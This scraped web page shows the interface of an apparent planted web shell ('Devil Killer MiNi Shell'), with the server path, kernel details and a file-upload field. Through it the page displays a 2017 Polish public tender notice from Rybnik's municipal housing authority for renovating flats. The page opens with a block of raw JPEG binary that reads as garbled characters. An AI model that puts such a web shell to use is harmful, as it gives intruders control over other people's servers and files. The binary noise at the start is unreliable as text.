JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170209/22738-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zgm.rybnik.pl/bip/' target='_blank'>http://www.zgm.rybnik.pl/bip/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 22738 - 2017
              z dnia 2017-02-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rybnik: Remont lokali mieszkalnych będących w zasobach Zakładu Gospodarki Mieszkaniowej 
w Rybniku z podziałem na zadania<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zakład Gospodarki  Mieszkaniowej w Rybniku, krajowy numer identyfikacyjny
              , ul.
              ul. Kościuszki 
              17,
              44200  
              Rybnik, woj.
              śląskie, państwo
              Polska, tel.
              32 422 12 47, e-mail
              dzp@zgm.rybnik.pl, faks
              324 221 247.
              <br />
              Adres strony internetowej (URL): www.zgm.rybnik.pl/bip/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zgm.rybnik.pl/bip/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zgm.rybnik.pl/bip/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Forma pisemna<br />
                Adres:
                <br />Zakład Gospodarki Mieszkaniowej w Rybniku ul. Kościuszki 17 44-200 Rybnik, Dział Zamowień Publicznych i Umów pok. 26</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Remont lokali mieszkalnych będących w zasobach Zakładu Gospodarki Mieszkaniowej 
w Rybniku z podziałem na zadania<br /><b>Numer referencyjny: </b>DZP.1120.0001.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest remont lokali mieszkalnych będących w zasobach Zakładu Gospodarki Mieszkaniowej w Rybniku z podziałem na zadania. Zamówienie zostało podzielone na 4 zadania. Zakres przedmiotu zamówienia obejmuje (zadanie nr 1-4): 1)	roboty murowe:
a)	zamurowanie przebić,
b)	uzupełnienie ścianek działowych,

2)	roboty z prefabrykatów gipsowych:
a)	wytyczenie przebiegu ścianek działowych zgodnie z wytycznymi inspektora nadzoru,
b)	zamocowanie konstrukcji z profili aluminiowych o szerokości 100 mm,
c)	wykonanie wzmocnienia z profili UA w miejscu otworów drzwiowych,
d)	wypełnienie szkieletu wełną mineralną grubości 100 mm,
e)	zamocowanie płyt gipsowo-kartonowych do konstrukcji  obustronne pojedyncze płytowane,
f)	zabezpieczeniem spoin taśmą zbrojącą oraz zaszpachlowanie połączeń,
3)	roboty tynkarskie:
a)	dokonanie oczyszczenia i odpylenia powierzchni,
b)	wykonanie powłoki gruntującej,
c)	wykonanie tynków,
4)	stolarka budowlana:
a)	demontaż istniejącej stolarki okiennej i drzwiowej,
b)	osadzenie ościeżnic aluminiowych, stalowych, drewnianych i PCV dla skrzydeł okiennych i drzwiowych,
c)	montaż i regulacja skrzydeł okiennych i drzwiowych,
d)	montaż parapetów,
e)	wykończenie ościeżnic,
5)	okładziny ceramiczne:
a)	gruntowanie podłoża,
b)	wykończenie okładzin ścian płytkami ceramicznymi,
c)	montaż listew narożnych zewnętrznych i wewnętrznych (frazowanie krawędzi wypukłych),
d)	wykonanie spoinowania,
6)	posadzki:
a)	usunięcie warstwy wykończeniowej  płytki ceramiczne,
b)	usunięcie gruzu z budynku,
c)	wywiezienie gruzu i odpadów z terenów rozbiórki,
d)	gruntowanie podłoża,
e)	przygotowanie podłoża,
f)	wykonanie wylewki samopoziomującej,
g)	wykonanie cokolików z płytek gresowych, wraz z ułożeniem listwy wykańczającej, spionowaniem oraz uszczelnieniem masą elastyczną,
7)	posadzki  panele podłogowe:
a)	oczyszczenie oraz przygotowanie podłoża pod posadzki z paneli,
b)	ułożenie warstwy z pianki wygłuszającej,
c)	ułożenie paneli podłogowych,
d)	montaż listew wykańczających w kolorze paneli podłogowych,
e)	   zabezpieczenie posadzki do czasu odbioru robót,
8)	roboty malarskie ścian i sufitów,
9)	instalacje wody zimnej ciepłej oraz kanalizacji sanitarnej:
a)	demontaż rurociągów i przyborów sanitarnych,
b)	montaż przewodów instalacji wody zimnej i ciepłej z rur PP,
c)	izolacja cieplna przewodów otulinami,
d)    montaż armatury:
       - odcinającej  zawory kulowe, zwrotny antyskażeniowy EA,
       - czerpanej  baterie umywalkowe, zlewozmywakowe, natryskowe, zawory czerpane ze   
       złączka do węża,
    e) montaż przewodów kanalizacyjnych na ścianach i w podłodze z rur PVC w tym:
    - podejść odpływowych,
    - pionów kanalizacyjnych,
     f) montaż przyborów i urządzeń sanitarnych: umywalki, zlewozmywaka, brodzika natryskowego, miski ustępowej, czyszczaków, zaworów powietrznych,
    g) montaż wodomierza skrzydełkowego,
    h) próba szczelności i płukanie instalacji,
    i) roboty towarzyszące, wykończeniowe:
   - przebicie i zabetonowanie otworów w ścianach,
   - wykucie i zabetonowanie bruzd w ścianach i posadzkach,
   - wywóz i utylizacja gruzu,
10) instalacja centralnego ogrzewania:
a)	montaż rurociągów miedzianych na ścianach,
b)	montaż grzejników stalowych płytowych typu VM i C-STD,
c)	montaż armatury:
- regulacyjnej: zaworów i głowic termostatycznych, zaworów STAD,
- odcinającej: zaworów kulowych, zaworów powrotnych, zestawów przyłączeniowych,
d)	izolacja cieplna przewodów otulinami,
e)	płukanie, próba szczelności i próba na gorąco instalacji z dokonaniem regulacji,
       f)  roboty towarzyszące, wykończeniowe:
           - wykucie wnęk w ścianach,
           - przebicia instalacyjne przez ściany,
           - bruzdy w ścianach i posadzkach,
           - wywóz i utylizacja gruzu,
11) instalacja gazowa:
a)	montaż rurociągów stalowych i miedzianych na ścianach,
b)	montaż zaworów odcinających kulkowych gazowych,
c)	podłączenie kotła gazu do c.w.u.,
d)	próby szczelności instalacji gazowej i odbiór,
            e)  roboty towarzyszące:
                - zabezpieczenie antykorozyjne rurociągów,
                - przebicie otworów w ścianach i stropach,
    - wywóz i utylizacja gruzu.
12) instalacja elektryczna:
	a) demontaż opraw oświetleniowych we wszystkich pomieszczeniach remontowanych,
b) demontaż starych przewodów elektrycznych oraz kabli strukturalnych w remontowanych pomieszczeniach ,
c) demontaż istniejącego osprzętu (łączniki światła, przewody elektryczne podtynkowe, gniazdka elektryczne),
d) montaż instalacji elektrycznych (układanie podtynkowych przewodów elektrycznych, osadzenie puszek podtynkowych),
e) montaż osprzętu elektrycznego (nowe gniazda elektryczne, łączniki oświetlenia),
f) montaż tablicy wnękowej w ścianie,
g) wykonanie pomiarów powykonawczych. 

Szczegółowy zakres zamówienia precyzują: specyfikacja techniczna wykonania i odbioru robót oraz przedmiary robót.
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45442100-8,
                45330000-9,
                45333000-0,
                45331100-7,
                45311200-2,
                45421000-4,
                45432110-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              191795.22<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 60<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Formularz ofertowy.
2.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na formularzu zgodnym z treścią załącznika nr 2 do SIWZ.
3.	Oświadczenie o spełnianiu warunków udziału w postępowaniu na formularzu zgodnym z treścią załącznika nr 3 do SIWZ.
4.	W przypadku wadium wnoszonego w formie innej niż pieniężna dowód wniesienia wadium tj. gwarancję/poręczenie.
5.	Kosztorys ofertowy.
6.	Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii w sytuacji:
1)	Wykonawców wspólnie ubiegających się o udzielenie zamówienia  pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy,
2)	podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz 
z ofertą  pełnomocnictwo do podpisania oferty.
7.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się 
o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. 
8. Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Zamawiający zamieści informacje, o których mowa w art. 86 ust. 5 ustawy w pliku o nazwie Zbiorcze zestawienie ofert na swojej stronie internetowej: http://www.zgm.rybnik.pl/bip/</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Każda oferta musi być zabezpieczona wadium w wysokości: 
dla zadania 1: 1 000 PLN (jeden tysiąc złotych)
dla zadania 2: 1 000 PLN (jeden tysiąc złotych)
dla zadania 3: 1 000 PLN (jeden tysiąc złotych)
dla zadania 4: 1 000 PLN (jeden tysiąc złotych)
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja na roboty budowlane</td><td>10</td></tr><tr><td>Gwarancja na urządzenia i przybory</td><td>10</td></tr><tr><td>Termin</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
